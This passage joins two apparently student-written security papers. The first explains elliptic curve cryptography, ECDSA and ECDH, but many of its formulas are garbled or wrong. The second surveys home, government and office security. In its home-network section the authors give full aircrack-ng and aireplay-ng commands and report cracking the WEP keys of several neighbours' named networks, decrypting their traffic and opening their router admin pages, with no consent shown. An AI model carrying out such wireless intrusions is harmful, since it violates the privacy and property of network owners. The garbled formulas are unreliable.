Let J = (xJ, yJ), K = (xK, yK) and L = (xL, yL).
Let s be the tangent at the point J and a be one of the parameters chosen with the
elliptic curve. The equation to find the line will be s = (3xJ2 + a) / (2yJ)
To find xL and yL, the following equation can be used:
1.
2.
xL = S2 – 2xJ
yL = -yJ + S(xJ – xL)
Both point addition and point doubling are necessary operations for point
multiplication.
Although the graph for elliptic curve on a Prime field is not a smooth curve, the rules
for point doubling can still be adapted for such graph. As the elements of the Prime
field are integers between 0 and P – 1, the equation of the graph for the elliptic curve
on a prime field will be y2 mod P = x3 + ax + b mod P where 4a3 + 27b2 mod P ≠ 0. In
elliptic curve cryptography, the prime number P will be chosen in such a way that
there will be many points on the elliptic curve in order to make the encryption
stronger.
Since the rules for point doubling can be adapted to elliptic curve on a Prime field, the
equations will be the following:
43
1.
2.
3.
S = (3xJ2 + a) / (2yJ) mod P
xL = S2 – 2xJ mod P
yL = -yJ + S(xJ – xL) mod P
Similarly for Binary field, despite having different equation and elements, the rules
for point doubling can be adapted to the graph of elliptic curve on a Binary field. The
equation of the graph for elliptic curve on a Binary field is as follows: y2 + xy = x3 +
ax2 + b where b ≠ 0.
Since the rules for point doubling can be adapted to elliptic curve on a Binary field,
the equations will be the following:
1.
2.
3.
S = xJ + (yJ / xJ)
xL = S2 + S + a
yL = xJ2 + xL(S + 1)
For projective coordinate system, the need of multiplicative inverse operation in point
addition and doubling can be eliminated. This improves the efficiency of point
multiplication operation by reducing the process of converting a given point in affine
coordinate to projective coordinate before point multiplication then converting it back
to affine coordinate after point multiplication to only one multiplicative inverse
operation. The operation in projective coordinate will involves more scalar
multiplication than in affine coordinate. However, ECCon project coordinate will
only be efficient when the multiplicative inverse operation is slower than the
implementation of scalar multiplication.
Despite having a different equation of the graph for elliptic curve in projective
coordinate and point (X, Y, Z) in projective coordinate, the point doubling formula of
L = 2J is still similar to doubling a point in project coordinate. As a note, point (X, Y,
Z) in projective coordinate corresponds to the point (X/Z, Y/Z 2) in affine coordinate.
The equation of the graph for elliptic curve in project coordinate is Y 2 + XYZ = X3Z
+ aX2Z2 + bZ4.
Let (X3, Y3, Z3) = 2(X1, Y1, Z1)
1.
2.
3.
4.
5.
Z3 = X12. Z12
X3 = X 1
4 + bZ14
Y3 = bZ1
4Z3 + X3(a. Z3 + Y12 + b.Z14)
2.4 Point Multiplication
The main cryptographic operation in ECC is point multiplication which computes Q =
kP as mentioned earlier. The point P which is on the elliptic curve is multiplied by an
integer k resulting in another point Q on the same curve. Point multiplication can be
done by a combination of the two basic elliptic curve operations: point addition and
point doubling which were explained on earlier sections.
44
In order to find perform point multiplication, log2 (k) will be required in order to fully
compute. For example, if k = 11, then 11P = 2((2(2P)) + P) + P. If k = 23, then 23P =
2(2(2(2P) + P) + P) +P. This is the easiest method to perform point multiplication and
there are other methods such as windowed method, sliding window method and
wNAF method in computing point multiplication.
3 Underlying Theory of ECC
3.1 Public key and private key
Assuming P and Q are 2 points on an elliptic curve such that Q = kP and k is a scalar.
If only P and Q are given, it‟ll be very hard to compute k which is not only the
discrete logarithm of Q to the base P but also serves as the private key which is
selected randomly by the user.
Basically to generate both public key and private key, the user selects a random
integer k which is the private key and computes kP which will serve as the
corresponding public key.
3.2 Discrete Logarithm Problem
The discrete logarithm problem is described as the problem of finding x in the
equation of gx = h provided that the elements g and h are of a finite cyclic group G.
The discrete logarithm problem can also be described in another way, it‟s to compute
logh = g when g and h are prime numbers.
It is similar to the factoring problem whereby when the prime number becomes very
big, the computation will be very slow; hence leading to the belief that discrete
logarithm problem is very difficult. ECC is one of the cryptographic systems that rely
on the difficulty of the discrete logarithm problem. Other cryptographic systems
include Diffie-Hellman key agreement and Digital Signature Algorithm.
3.3 Elliptic Curve Domain Parameters for different finite fields
In order to use ECC, all parties involved in the secured and trusted communication
using ECC must agree on the elements and parameters which are called domain
parameters that define the elliptic curve. Apart from the parameters a and b, other
domain parameters for Prime field and Binary field must also be agreed. They will be
described further later. The generation of domain parameters is not done by the
parties involved since it involves counting the number of points on the elliptic curve.
This will take up a lot of time and effort; hence there are several standard bodies such
as NIST and SECG who published domain parameters of elliptic curves for some
common field sizes.
45
3.3.1 Domain parameters for Elliptic Curve over Prime field
For the elliptic curve over prime field, the domain parameters are p, G, n and h, as
well as parameters a and b defined in the elliptic curve function, y2 mod p= x3 + ax +
b mod p. p represents the prime number defined for prime field.
 G is the generator point coordinates (xG, yG) which is a point on the elliptic
curve chosen for the cryptosystem
 n is the order of the elliptic curve.
 h = (number of points on the elliptic curve)/n, which is the cofactor
 The scalar for point multiplication is chosen as a number between 0 and n-1.
3.3.2 Domain parameters for Elliptic Curve over field Binary field
For the elliptic curve over binary field, the domain parameters are m, f(x) as well as
domain parameters G, n, h, a and b defined for elliptic curve over prime field above.
 m is an integer defined for the binary field where length of elements of the
binary field ≤ m bits
 f(x) is a polynomial function with irreducible polynomial degree of m
 The scalar for point multiplication is chosen as a number between 0 and n-1.
4 Advantage over current schemes / Motivation
4.1 Small key size
Comparing Integer Factorization (RSA) against Elliptic Curve Discrete Logarithm
(ECDSA), they both have different mathematical problem when the attacker wishes to
solve it and there are different methods in solving the problem. The mathematical
problem of Integer Factorization is to find the prime factors of a number n whereas
the mathematical problem of Elliptic Curve Discrete Logarithm is to find k in the
equation Q = kP, with points Q and P on an elliptic curve.
The most efficient and fastest method to solve Integer Factorization is the Number
Field Sieve with the formula exp[1.923(log n)1/3 (log log n)2/3] (Sub-exponential)
while the most efficient and fastest way to solve Elliptic Curve Discrete Logarithm is
by Pollard-Rho algorithm with the formula sqrt(n) (fully exponential). Since the
method Pollard-Rho algorithm runs more slowly than Number Field Sieve, ECC can
offer the same security as bigger keys using Integer Factorization. This allows a 160bit ECC key to run at equal level as a 1024-bit RSA key.
The smaller key size allows for faster computations, lesser bandwidth and memory
usage and lower power consumption. So not only do small embedded devices benefit
from using ECC, web servers can also lower computation and resources usage by
using ECC.
46
5 Practical use of ECC
5.1 ECDSA - Elliptic Curve Digital Signature Algorithm and explanation
5.1.1 Digital Signature and DSA
A digital signature algorithm is used for ensuring the authenticity of a message sent
from the sender to the receiver. For instance, Alice and Bob are the two parties
involved in the transmission. Both Alice and Bob will have their own public key and
private key, as well as each other‟s public key. If Alice sends a message to Bob
encrypted using Bob‟s public key, only Bob will be able to decrypt the message using
his private key which is only known to him. Bob will then digitally sign his reply
back to Alice by hashing his reply to create a message digest. The message digest
assures that any changes made to the message that has been signed will not go
undetected. Bob will then encrypt the message digest with his private key to create his
digital signature.
DSA has three phases; key generation, signature generation and signature verification.
DSA Key Generation
The key generation algorithm selects a random integer x where 0 <x <q. The private
key is x and the public key is y = mod p, within the domain parameters (p, q, g).
DSA Signature Generation
Let H be the hashing function (e.g. SHA-1) and m is the message:
1) Select a random integer k where 0 < k < q
2) Compute r = ( mod p) mod q
3) Calculate s = [
( H(m) + x.r) ) ] mod q
The digital signature (e.g. Bob‟s) will be (r, s). Bob can now append his digital
signature with the message he wants to send back to Alice.
DSA Signature Verification
To verify Bob‟s signature (r, s) on m, Alice obtains authentic copies of Bob‟s domain
parameters (p, q, g) and public key y and does the following:
1)
2)
3)
4)
5)
Reject the signature if 0 < r < q or 0 < s <q is not satisfied
Calculate w =
mod p
Calculate u1 = H(m).w mod q
Calculate u2 = r.w mod q
Calculate v = ((
.
) mod p) mod q
Alice will be able to verify the digital signature with Bob‟s public key known. The
signature is valid if v = r.
47
5.1.2 Elliptic Curve Digital Signature and ECDSA
The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the above
mentioned DSA, using the elliptic curve cryptography. Essentially, ECDSA can be
viewed as the elliptic curve version of the older discrete logarithm cryptosystems
whereby the prime order group of non negative integers are replaced by the group of
points on the elliptic curve over a finite field.
The bit size of the public key used for ECDSA is about twice the size of security
levels (in bits) as compared to DSA. An ECDSA public key would only need to be
160 bits to provide the same security level of a DSA public key which is at least 1024
bits. In addition, both DSA and ECDSA signature size is the same for the same
security level.
Similarly, ECDSA has three phases like DSA, key generation, signature generation
and signature verification.
ECDSA Key Generation
Assuming Alice wants to send a message m to Bob, each will have a pair of keys
associated with a particular set of EC domain parameters, D = (q, FR, a, b, G, n, h).
There is an elliptic curve E defined over Fq, and P is a point of prime order n on the
elliptic curve (e.g. E(Fq) ), q is a prime. To generate the keys, Alice and Bob will
each have to:
1) Select a random integer d where 0 < d < n
2) Compute Q = d.P (Scalar Multiplication)
3) The public key will be Q and the private key will be d.
ECDSA Signature Generation:
Now that both Alice and Bob have a key pair suitable for elliptic curve cryptography,
private key d and public key Q within domain parameters D = (q, FR, a, b, G, n, h),
each of them can create their signature by doing the following:
1) Select a random integer k, where 0 < k < n
2) Compute kP = (x1, y1) and r = x1 mod n, where x1 is an integer between 0
and q-1
3) Compute
mod n
4) Compute s = [
( H(m) + d.r) ) ] mod n
Alice‟s signature for message m is the pair of integers (r, s).
ECDSA Signature Verification:
In order for Bob to verify Alice‟s signature appended to the message m, (r, s), Bob
obtains an authentic copy of Alice‟s domain parameters D = (q, FR, a, b, G, n, h) and
public key Q and does the following:
48
1)
2)
3)
4)
5)
Reject the signature if 0 < r < n-1 or 0 < s < n-1 is not satisfied
Compute w =
mod n, and H(m)
Compute u1 = H(m).w mod n
Compute u2 = r.w mod n
Compute u1.P + u2.Q = (x0, y0) and v = x0 mod n
Bob can accept the signature if v = r and verify that the message is sent by Alice.
5.2 ECDH - Elliptic Curve Diffie-Hellman and explanation
5.2.1 Diffie-Hellman Key Agreement
Diffie-Hellman (DH) is a key agreement protocol, whereby two entities with no prior
knowledge of each other create a shared secret key together, over an insecure
communication channel. This shared secret key can then be used to encrypt
subsequent communications.
For Alice and Bob to create a shared secret key, both parties need to first exchange a
prime P and a Generator G, where P > G and G is a primitive root of P. To share a
secret key, Alice and Bob need to do the following:
1) Generate a random number XA (Alice‟s private key) and XB (Bob‟s private
key)
2) Alice computes YA =
mod p and send it to Bob
3) Bob computes YB =
mod p and send it to Alice
4) Alice now computes Secret key =
mod p
5) Bob now computes Secret key =
mod p
5.2.2 Elliptic Curve Diffie-Hellman, ECDH
Elliptic Curve Diffie-Hellman is a variant of the Diffie-Hellman key agreement
protocol which allows two entities to establish a shared secret key as well. Similarly,
any third party who doesn‟t have access to private keys of both entities will not be
able to calculate the shared secret key even if he/she snoops upon the conversation.
The shared secret key generation between the two entities using ECDH requires the
agreement on elliptic curve domain parameters (defined in Elliptic Curve Domain
Parameters for different finite fields). Both entities will each have a pair of keys
consisting of a private key d, which is a randomly generated integer less than n, where
n is the order of the curve, and a public key Q = d.G where G is the generator point
within the elliptic curve domain parameter.
For instance, Alice will have her private and public key pair (dA, QA) and Bob will
have (dB, QB). To generate the shared secret key, both will do the following:
1) Alice computes K = (xk, yk) = dA. QB
2) Bob computes K = (xL, yL) = dB. QA
3) Since dA. QB = dA.dB.G = dB.dA.G = dB. QA. Therefore K = L and xk =
xL
49
Hence, the shared secret key between Alice and Bob is xk (or xL). As mentioned, a
third party will not be able to obtain the shared secret key as it is practically
impossible to find the private keys dA or dB from the public key K or L.
6 Possible attacks
In the elliptic curve cryptography, computation of the scalar multiplication of point P
with the secret scalar factor d, Q = d.P is a critical step. Hence many attacks aim to
discover the value d, which is the private key.
6.1 Side-channel attacks
A side channel attack is an attack based on information gathered from the physical
implementation of a cryptosystem, which is different from brute force attack or
cryptanalysis. The timing information (the amount of time various computations take
to perform), power consumption of the hardware, electromagnetic radiation leaks
(which can provide plaintexts and other information) and even the sound produced
during computation can provide extra source of information which can be used to real
secret keys and attack the cryptosystem.
There is an increasing trend of ECC implementations on smart cards and other
portable devices (where the secret key is stored inside the smart card, seen as a tamper
proof device as it is considered impossible to directly obtain the secret key without
destroying the information), which makes ECC vulnerable to side channel attacks. A
simple side channel attack attacker can try to derive the secret key directly from the
samples obtained. The attacker will need to have in depth knowledge of the
implementation of ECC algorithm he/she is attacking to successfully break the system.
In addition, the attacker will need to be able to monitor the side channel leakages of
the device and the secret key to be revealed must have a significant impact on the
leakage.
In ECDSA‟s scalar multiplication, Q = d.P implementations, the side channel attack
exploits the different patterns between the side channel features of the addition
operations and doubling operations of the point P on the elliptic curve. Hence, a
secure method to prevent side channel attacks is to remove the dependence between
the different patterns of side channel features of addition and doubling operations.
One way to remove the key-dependent patterns is undistinguishing the process of bits
“1” and “0” of multiplier d. This will help make the addition and doubling operations
indistinguishable, dividing each process into blocks by inserting dummy operations to
portray a repetition of instruction blocks which will not be detected by the attacker.
50
6.2 Fault attacks
While side channel attacks are passive attacks whereby the attacker listens to some
side channel for leakages without interfering with the computation, fault attacks (also
known as fault analysis attacks) are active attacks whereby the attacker has to access
to the target device and tampers with it in order to create faults or these faults may
occur due to hardware failure or bugs when the device is performing a private key
operation.
Basically, the attacker will take advantage of the faults found due to his malicious
activity or hardware failure. He can collect the incorrect data (caused by the faults)
such as those mentioned in side channel attacks (e.g. timing and power consumption)
sent out when the device is computing the private key.
7 Implementation
We realize there is quite amounts of mathematical knowledge involved in Elliptic
Cryptography, which might make it harder for people to understand how this
technique works. So in order to present this topic more intuitively and make the
theory easier to digest, we have developed a set of “Teaching ECC” web pages. These
web pages graphically detail the key elliptic curve point operations and elliptic curve
Discrete Logarithm problem involved. We also show how the underlying Elliptic
Cryptography operations work through an example of practical use, Elliptic Curve
Digital Signature Algorithm (ECDSA). The web pages are hosted at http://xiaokangz.comp.nus.edu.sg/CS3235/ECC .
Introduction Page:
This page briefly introduces the Elliptic Curve Cryptograph and general idea of
Elliptic Curve Cryptography. Key advantages of this technique are listed to show the
motivation of using such a scheme for computer security and readers will have a basic
understanding of the underlying theories of this cryptography.
Elliptic Curve Point Operations Page:
This page serves the purpose of giving necessary mathematical knowledge used in
Elliptic Curve Cryptography. We will show the Group Law of Elliptic Curve using
graphs. And in order to give readers an intuitive idea of how point operations are done,
interactive step-by-step demonstration on point doubling and point addition will be
shown. Simply go though every step of the operations by clicking mouse and every
step will be shown clearly on the graph.
Elliptic Curve Discrete Logarithm Page:
The high security of Elliptic Curve Cryptography relies on the difficulty of Elliptic
Curve Discrete Logarithm Problem. This page introduces and explains the problem
51
using a simple example. To show how secure Elliptic Curve Cryptography is, we
compare its key size with other cryptography schemes.
Elliptic Curve Digital Signature Algorithm Page:
We take a real example of Elliptic Curve Cryptography, the Elliptic Curve Digital
Signature Algorithm (ECDSA) for demonstration. This page clearly shows all steps
involved in both Signature Generation and Signature Verification. We have built a
simple underlying engine for Elliptic Curve Digital Signature Algorithm, which can
simulate the whole flow using small numbers. Thus readers can have the experience
of walking through the generation and verification of digital signature process.
8 References
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
Elliptic curve cryptography, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Elliptic_curve_cryptography
Discrete logarithm records, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Discrete_logarithm_records#Elliptic_curves
Public key cryptography, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Public-key_cryptography
Diffie-Hellman key exchange, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange
Elliptic curve Diffie-Hellman, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Elliptic_curve_Diffie%E2%80%93Hellman
Digital Signature Algorithm, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Digital_Signature_Algorithm
Elliptic curve DSA, Wikipedia, the free encyclopaedia,
http://en.wikipedia.org/wiki/Elliptic_Curve_DSA
Avinash Kak: Lecture 14: Elliptic Curve Cryptography and Digital Rights
Management,
https://engineering.purdue.edu/kak/compsec/NewLectures/Lecture14.pdf
Anoop MS: Elliptic Curve Cryptography, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf
RSA Laboratories, http://www.rsa.com/rsalabs/node.asp?id=2165
Youdzone: What is a Digital Signature, http://www.youdzone.com/signature.html
Aqueel Khalique, Kuldip Singh, Sandeep Sood: Implementation of Elliptic Curve
Digital Signature Algorithm,
http://www.ijcaonline.org/volume2/number2/pxc387876.pdf
Wu Keke, Li Huiyun, Zhu Dingju, Yu Fengqi: Efficient Solution to Secure ECC
Against Side-Channel Attacks,
http://www.ejournal.org.cn/english/qikan/manage/wenzhang/EN20110316.pdf
Anja Becker: Methods of Fault Analysis Attacks on Elliptic Curve Cryptosystems:
Comparison and Combination of Countermeasures to resist SCA (2006)
Sheueling Chang, Hans Eberle, Vipul Gupta, Nils Gura, Sun Microsystems
Laboratories: Elliptic Curve Cryptography – How it Works,
http://labs.oracle.com/projects/crypto/HowECCWorks-USLetter.pdf
52
Security Requirement in Different Environments
Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang
National University of Singapore
21 Lower Kent Ridge Road
Singapore 119077
Abstract. The rational for conducting this research is to explore the different
security measures and policies taken in environments such as home, office and
government. For office and military environment, we went to several
companies in Singapore, such as DSO and English Corner, for a field study to
understand how these companies protect their data and information.
Observations gathered are used to determine the security level of the various
environments. However we see a limitation to the research in the government as
details and policies are mostly non-disclosure. Therefore limited information
could be gathered via Internet research and field study. As for home
environment, a practical approach in detecting vulnerability of network is done
where open source software is used in Linux operating system to crack the
wireless network security. Moreover, an online survey is conducted to gather
more information about how individuals secure their wireless network in the
home environment.
1
Introduction
Security issues and policy have been a topic on news articles and is a growing
concern to all the different type of organization ranging from individual home
environment to large corporation such as Government Environment. In addition these
different environments might and required to deploy a different standard of security
policy. Therefore this document aims to look at the different measures related to
security taken by entities in different environments, specifically for Home,
Government and Enterprise environments. Through examining the physical measures,
computer security polices and wireless network security, this paper try to get a sense
of how knowledgeable these entities are and how far they are willing to go in terms of
protecting themselves from information theft.
This research paper aim to highlight the different aspects of the environment therefore
providing and highlighting ways in which improvement should be make in
accordance to the environment.
53
2
2.1
Security in Home environment
Types of device (Router, Modem) and Wireless Security used
The security deployed in the home environment varies with individuals and often
depends on the type of Internet service they subscript. In Singapore, there are 4
available network providers, namely, SingNet, Starhub, Pacnet and M1 but because
most Singaporeans subscribe to either SingNet or Starhub and as evidence from the
survey (Figure 33), which show that 71% of individuals uses SingNet and 24% uses
Starhub, only these two providers will be discussed.
For individuals who subscribe to SingNet, they will be provided with modem
(2WIRE), which come with pre-configuration and default security setting. The older
default security for the modem uses “WEP” encryption – with support from the
collected survey in Figure 16 to Figure 32, individuals who subscribe to SingNet
more than a year ago uses “WEP” encryption for their wireless network– for wireless
and there are no password require to access into the device’s administration.
Although the new device has improve their wireless security, WPA-PSK MIXED
is used, there are still no default password require to access into administration. On
the other hand, the security for Starhub can be quite different or vulnerable. The
default setting for the device (Linksys) has no wireless protection and anyone can
connect to it. Individuals are required to set their own security if they were to use
Starhub.
There are other routers sold in the market that individual can use to replace or addon to these existing routers which, ought to be deploy a better security than the
providers’ device, but seldom do individuals willing to spend extra money to purchase
a router as the existing one is suffice for surfing the Internet. The following sections
discuss the vulnerability of the wireless network in the home environment based on
real practical test deployed near a range of home networks.
2.2
Wireless security deployed in home environment (Research)
There are pre-requisites before our practical test can be deployed at the home network
environment. In our test, we will be using a USB D-Link network device as a base
station to detect nearby wireless signal. Moreover, we will be using Ubuntu 11.10 for
our operating system as it could run network-monitoring tools more efficiently as
compare to windows. There are various tools used such as aircrack-ng, tcpdump, etc.
To lookup on nearby wireless, ‘aircrack-ng’ monitoring tool is used. Figure 1 and 2
show the entire nearby available wireless network when the command “airodump-ng
mon0” is entered, where mon0 is the wireless interface used. These two figures are
captured in different location and we can see that most wireless network use WEP to
secure the network although there are networks being secured using WPA/WPA2 but
some, didn’t even secure their network at all.
There are many reasons why WEP is still being used to secure wireless network in
the Home environment. The most basic and common reason is that individuals do not
have prior IT knowledge. To them, being able to connect to Internet with a simple
54
protection to deter other unauthorized users are sufficient. They do not have any
knowledge about what WEP, WPA and WPA2 are and often just uses the default
protection that is provided from the Internet Providers and some of them did not even
protect their wireless.
The second reason might lies with the ISP and vendors who supply the modem and
router to them. For older devices, 3 to 4 years ago, it uses WEP for default protection.
ISP efforts in offering “WEP” were to prevent sharing of Internet connection rather
than for individual’s security. Although basic protection for newer devices uses
WPA/WPA2, there are many individuals who did not change and are still using the
older devices. WPA/WPA2 is used because of the weakness in WEP and also, the
larger coverage (IEEE 802.11n) area it supports can be prone to attacks.
WEP encryption is vulnerable to attack and there are available tools such that it
takes advantage of weakness in the WEP key algorithm to attack a network
successfully and discover the WEP key [1]. To crack a WEP network, sophisticated
hardware or software tools are not required; Wi-Fi enable laptop and open-source
network tools are sufficient. In the next section, we will show how easily WEP can be
crack as compare to WPA and WPA2.
2.3
Vulnerability (Research)
2.3.1 WEP
A number of flaws were discovered in the WEP algorithm in particularly, there are
attacks such as passive attacks that decrypt traffic, active attack to inject new traffic,
active attacks to decrypt traffic and dictionary-building attack that could allows realtime automated decryption of all traffic. [2]
In this study, we will be using aircrack-ng[3] to recover WEP. Aircrack-ng uses the
new unique initialization vector (IV) inside each packets and a large about of data
packets are required to crack the WEP key. With the large amount of packets
captured, keys can be found by implementing the standard FMS, Korek and PTW
attack on the data packets that are captured
In the previous section, we have managed to probe for nearby wireless networks,
the next step is to locate any WEP-secured network that could be use for breaking. In
Figure 3.1, we could see that ESSIB, “ruiqi” with BSSID of 00:1A:70:95:6A:C6 uses
WEP. We will be using this network to recover the WEP key.
To monitor and capture the traffic for ‘ruiqi’, the command, “sudo airodump-ng -c
11 –bssid 00:1A:70:95:6A:C6 -w ruiqi mon0” is executed where c is the channel to
listen and w is the file that to be written. If there is no existing host connecting to the
network, the data capture will be very slow (approx. 20,000 packets is required), but
sometimes, it will be slow even there is any host connected to it. (Figure 3 top left).
The next step is to do a fake authentication with the Access Point (AP). In order for
the AP to accept packets, the source MAC address must be associated with it.
55
To associate the access point the command, ‘sudo aireplayng -1 6000 -o 1 -q 10 -e
ruiqi -a 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0’2 is issued. This packet will
be sending to the AP continuously to keep the association alive (Figure 3 top right) 1.
Although we manage to do a fake authentication with the AP, the packet received
from the AP will be very slow. In order to speed things up, packet reinjection with
‘aireplay-ng’ is used. The command, ‘sudo aireplay-ng --arpreplay -x 50 -b
00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0’ is used and the number of data
packets shoot up dramatically (Figure 3 bottom right).
After a certain amount of packets, in this case, 20,006 packets, are received, the
last step is to decrypt these packets in order to get the WEP key. The command,
‘aircrack-ng -b 00:1A:70:95:6A:C6 ruqi-01.cap’ is issued to start decrypting the
packets and the WEP key was found after processing these packets (Figure 3 bottom
left).
To verify that the key does work, it is used to decrypt the packets that is send and
received via the ‘ruiqi’ AP. In Figure 3.4, we can see the decrypted packet headers in
plain texts and there are some packets that are send from owner’s host to AP.
Other than ‘ruiqi’ AP, we also test out with other AP that uses WEP, which can be
show in Table 1 and individual AP are shown in Figure 4 to 7.
With all these WEP AP being cracked, it is evident in showing that WEP is not
really secure, as it does not require much effort to crack it – less than three hours to
crack all five AP in our case. Table 2 shows a full detail step of cracking AP that uses
WEP to secure their network.
2.3.2 WPA/WPA2
As compared to WEP, WPA and WPA2 required more effort and time to crack and
only pre-shared keys (PSK) could be cracked using available software such as
aircrack-ng. Unlike WEP where we can speed up the packets to retrieve enough IV to
find the passphrase, the only attack in WPA and WPA2 are plain brute force
techniques (Dictionary Attack) because the key used is not static, so collecting IVs
does not speed up the attack. Instead, the information used to start cracking WPA and
WPA2 is the handshake between client and AP. To illustrate, we have tried to attack
WPA and WPA2 in the home environment and below are our results.
To start the interface and probe for nearby wireless network, the method used is as
the same from the previous section and will not be discuss here again.
Instead of monitoring and capture traffic from the network chosen, in this case we
used ESSID of “Remyidah” as shown in Figure 4.0, we are collecting authentication
handshake for that network and the command, airdump-ng –c 9 –bssid
00:1A:2B:8A:48:B9 –w Remyidah wlan0 is used and is shown in the top image of
Figure 10.
1
-1 means fake authentication, 6000 is the re-association timing in seconds, -o 1
means send only one set of packet at a time, -q 10 means send keep alive packets
every 10 seconds.
56
Although there as a way to deauthenticate wireless client by using the command
“aireplay-ng -0 1 –a 00:1A:2B:8A:48:B9 wlan0”, this attempt was used for the case
but failed. Therefore, we waited for nearly three hours for new 4-way handshakes to
occur in the network as shown at the bottom image of Figure 4.0. Once the
handshakes are capture and saved into Remyidah.cap, the next step is to actually
crack the WPA/WPA2 pre-shared key with the password list keys we have obtained.
The command “aircrack-ng –w password.lst –b 00:1A:2B:8A:48:B9” is used and the
result is shown in Figure 11.
Unfortunately, we are unable to crack the passphrase for the Remyidah network
but we have also demonstrated this method on our own device with a given
commonly used words as shown in Figure12 to retrieved passphrase.
In conclusion, we can see that WPA-PSK and WPA2-PSK are vulnerable to brute
force attack if the keys used are common known English words, known passwords
and relatively short in length. Otherwise, it is nearly impossible to crack and hack into
WPA because the technique will become more difficult to crack a long and random
alphanumeric passphrase. The steps for our attempt to crack WPA-PSK an WPA2PSK are detailed in Table 3.
2.4
Other vulnerabilities in home environment (Research)
2.4.1 Administrator Access
Every router or modem each has its own set of instructions to manage the network
such as MAC filtering and network firewall. These instructions can be access via the
router’s address, for example 192.168.0.1, only by those who have administrator
rights. By default, most of these device does not uses any protection and even it they
are, the user id and password are the same, for example, ‘admin’ for both.
In the survey we have done to have a better understanding of individual access to
their home network, there are almost 42% of individuals who did not secure or use the
default setting for their network protection. Moreover, Figure 13 and 14 displays the
administrator pages from the home networks that we have their WEP key cracked
previously. In Figure 13, there is no password protection so it can be access without
any effort. Although there is password protection for Figure 14, default protection is
being used, which are “admin” for both username and password.
We can see that for most home networks, individuals do not set or change the
password for their device. Hence if any chance that their keys are compromise, their
device will also be taken over by the intruder although they can reset the device if that
happen.
2.4.2 Firewall
On default, the firewall for modem in the home environment blocks access of
unwanted activities in the Internet and act as a first-tier defense for all the devices
connected to the AP. Although the firewall are not able to scan packets as of a
software firewall, these blockage prevent the home network from being flooded and
57
could deter attack such as DNS. Firewall for router and modem are set as enable as
default and is sufficient for the protection in the network itself. Figure 15 shows the
default setting for firewall of the previously hacked home network.
3
Security in Government’s Institutes
In the government’s institutes, there are huge collections of secrets and confidential
information being stored in employee’s laptop and central server within the institutes.
In addition, frequent transmission of top secrets and confidential documents in digital
form are required for normal operations each and every day. Hence, there is a need to
maintain a proper level of security for these digital resources.
In Singapore, our government has entrusted several companies to develop a wide
spectrum of unique technologies and solutions to safeguard government’s institutes
against potential security threats. For example, Singapore government partner with eCop which developed government’s centrally administered desktop firewall (CAFÉ)
and provided 24x7 network surveillance technology and service to detect attacks
before they can cause any harm to IT systems[4]. Another example is the partnership
with OPUS IT where it provides network forensics security solutions to various
government agencies in Singapore. Its network-centric forensic technology system
acts as a ‘silent’ shadow-surveillance enabling detective work for security & policy
breach as well as fine-tuning high end network performance throughput. All systems
developed by e-Cop and OPUS IT are being employed in Mindef-related institutes.
To prevent intellectual property, trade secrets, and other confidential and
proprietary business information from leaking out via recording devices, Singapore
government banned camera phone and other recording devices in Mindef-related
institutes and agency working on projects with confidential information. Severe
punishment will be handed to personnel if they failed to comply with the policy. This
policy is implemented in many countries’ government agencies such as Japan, China
and Malaysia. Malaysia barred all gadgets with camera facilities from being brought
into high-security government premises. The ban will prevent spying and the leaking
of sensitive information or official secrets, which could jeopardize national security
[5]. In addition, Government bodies were also instructed to look into
installing electronic jamming devices in security zones to prevent unauthorized
communication or transmission of data and images [5]. The electronic jamming
devices works by combining hardware transmitters with a small piece of control
software loaded into a camera phone handset. Hence, whenever the camera phone
entered an area with electronic jamming hardware, the phone’s camera will be
deactivated [6]. This prevents personnel from using the camera in these areas secured
with electronic jamming hardware.
3.1
Centrally Administered Desktop Firewall
The main intention of CAFÉ is to eliminate network-based attacks transmitted by
thumb drives within the government. When the users are connected to the
58
Government network directly or remotely by the government desktop, an updated set
of desktop firewall policies will be downloaded. Whenever a thumb drives is inserted
into the Desktop, it will scan through all the data in it with CAFÉ. In the event that an
infected computer is connected to the government network, CAFE will prevent the
computer from spreading threats to other computers on the network. CAFÉ is further
enhanced by 24x7 round-the-clock surveillance where it provides comprehensive
reporting, incident handling with prompt responses, and prevention of unauthorized
access or intrusion.[4]
Similar to Singapore, USA also limit the usage of thumb drive and all other
removable devices on its network due to the concerns that malicious programs may be
transmitted using these mediums [7].
3.2
Case Study in DSO
While working in Defense Science Organization (DSO) as an intern during the last
vacation, I noticed that it has a very stringent security regulation against all
employees and visitors entering the building. A possible reason is that the activities
conducted in the company are of high confidential as they are responsible to conduct
research for future warfare. For example, their purpose is to develop technologies and
solutions for the Singapore Armed Forces to sharpen the cutting edge of Singapore’s
national Security.
When entering the building, all visitors and employees will be screened by the
security guards before they are cleared to enter the building. Any devices with camera
function are not allowed to bring into the building. This is to ensure that no one can
use these devices to capture importance information and leak the information to the
unauthorized party. Furthermore, they are only allowed to bring in authorized laptop
or equipment distributed by DSO to the building. Comparing to other companies,
DSO does have a tighter security checks where it try to prevent potential harmful
devices from entering the company.
To access a department in the building, employees are required to scan it with their
access card. However, each access card has different access right or permission
depending on the individual’s job, rank and security clearances.
An interesting point to note is there is no wireless connection in the entire building.
Employees are required to access to the internet using wired connection (Ethernet).
My mentor in DSO highlighted to me that wired connection is inherently more secure
than wireless connection. Wireless, through its technological nature, can be
intercepted easily as date being sent and received are transmitted in the air. Though
wired connections can also be infiltrated, the need for physical access to the wires in
most cases makes it inherently much more secure [8]. The security of wired
connection is enhanced by the strict security checked at the entrance of the building
and numerous surveillance cameras are installed at various places to detect suspicious
activities.
However, the Ethernet cable used is Cat 5/6 twisted pair which is not “Tempest”
shielded. This means that the cable will emit electromagnetic radiation (EMR) in a
manner that can be used to reconstruct intelligible data. With the correct equipment
59
and techniques, it is possible to reconstruct all or a substantial portion of that data [9].
